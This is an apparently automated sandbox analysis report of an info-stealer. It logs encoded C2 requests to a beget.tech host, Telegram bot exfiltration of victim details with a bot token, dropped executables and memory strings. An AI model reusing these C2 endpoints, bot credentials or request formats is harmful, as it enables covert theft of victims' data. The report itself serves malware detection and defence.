p9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOlXRqp1dJNETpV1QNl2bql0aaR0TtJkaZJTRqlFaGdVTsZEVPFTSykFbWpWTshGRNdXRq5UMjpXWsJEVZBTRX9UaK1mWyk0QMlWVD10dFpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZrRlTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: monrul3t.beget.tech
              Source: global trafficDNS traffic detected: DNS query: ipinfo.io
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot7170051875:AAE6pL_pl17E85H-TlJS2rKEh_uqVfRc8Gk/sendPhoto?chat_id=5922069347&caption=%E2%9D%95%20Pipavsya%20%E2%9D%95%0A%E2%80%A2%20ID%3A%202068c5dd94a8a9c670748c61bdf89871812759c4%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20user%0A%E2%80%A2%20PC%20Name%3A%20035347%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%208.46.123.189%0A%E2%80%A2%20GEO%3A%20US%20%2F%20New%20York%20City%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CIdle.exe HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3253052978f8Host: api.telegram.orgContent-Length: 696321Expect: 100-continueConnection: Keep-Alive
              Source: Idle.exe, 0000001E.00000002.4123458318.00000000028B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://monrul3t.beget.tech
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://monrul3t.beget.tech/
              Source: Idle.exe, 0000001E.00000002.4123458318.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Zt
              Source: Idle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.a.0/sTy#n
              Source: Idle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c.0/ti
              Source: Idle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.hotosh#n
              Source: Idle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adoraw-se#n
              Source: Idle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.photo/#n
              Source: System.exe, 00000004.00000002.1800682479.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonx
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012CE0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012CD8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012B8D000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012AE8000.00000004.00000800.00020000.00000000.sdmp, KR0POkAyjk.30.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012AC3000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012B68000.00000004.00000800.00020000.00000000.sdmp, KR0POkAyjk.30.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012B8D000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012AE8000.00000004.00000800.00020000.00000000.sdmp, KR0POkAyjk.30.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012AC3000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012B68000.00000004.00000800.00020000.00000000.sdmp, KR0POkAyjk.30.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012CE0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012CD8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012CE8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/p
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012CE8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53639
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53641
              Source: unknownNetwork traffic detected: HTTP traffic on port 53641 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53639 -> 443
              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:53639 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:53641 version: TLS 1.2
              Source: C:\Recovery\Idle.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary

              barindex
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Recovery\Idle.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000F718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_000F718C
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exeJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Windows\TAPI\bc31d5a79a9161Jump to behavior
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Windows\LiveKernelReports\WinStore.App.exeJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Windows\LiveKernelReports\fd168b19609dffJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000F857B0_2_000F857B
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0011D00E0_2_0011D00E
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000F407E0_2_000F407E
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_001070BF0_2_001070BF
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_001211940_2_00121194
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000F32810_2_000F3281
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000FE2A00_2_000FE2A0
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_001102F60_2_001102F6
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_001066460_2_00106646
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0011070E0_2_0011070E
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0011473A0_2_0011473A
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_001037C10_2_001037C1
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000F27E80_2_000F27E8
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000FE8A00_2_000FE8A0
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000FF9680_2_000FF968
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_001149690_2_00114969
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_00103A3C0_2_00103A3C
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_00106A7B0_2_00106A7B
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_00110B430_2_00110B43
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0011CB600_2_0011CB60
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_00105C770_2_00105C77
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000FED140_2_000FED14
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_00103D6D0_2_00103D6D
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010FDFA0_2_0010FDFA
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000FBE130_2_000FBE13
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000FDE6C0_2_000FDE6C
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000F5F3C0_2_000F5F3C
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_00110F780_2_00110F78
              Source: C:\ProgramData\ssh\System.exeCode function: 4_2_00007FFD9BAB35C54_2_00007FFD9BAB35C5
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA9342730_2_00007FFD9BA93427
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA9A26D30_2_00007FFD9BA9A26D
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BAA70E430_2_00007FFD9BAA70E4
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA9A80830_2_00007FFD9BA9A808
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA9C79830_2_00007FFD9BA9C798
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BAA2FA830_2_00007FFD9BAA2FA8
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BAA463030_2_00007FFD9BAA4630
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BAA3C5930_2_00007FFD9BAA3C59
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BAA3AE830_2_00007FFD9BAA3AE8
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA9C16830_2_00007FFD9BA9C168
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA9984930_2_00007FFD9BA99849
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA92C3030_2_00007FFD9BA92C30
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA9A67830_2_00007FFD9BA9A678
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA92C3030_2_00007FFD9BA92C30
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BD7480830_2_00007FFD9BD74808
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BE80F5D30_2_00007FFD9BE80F5D
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BAA515030_2_00007FFD9BAA5150
              Source: C:\Recovery\Idle.exeCode function: 33_2_00007FFD9BAB35C533_2_00007FFD9BAB35C5
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeCode function: 34_2_00007FFD9BAC35C534_2_00007FFD9BAC35C5
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeCode function: 36_2_00007FFD9BAD35C536_2_00007FFD9BAD35C5
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: String function: 0010E28C appears 35 times
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: String function: 0010E360 appears 52 times
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: String function: 0010ED00 appears 31 times
              Source: System.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
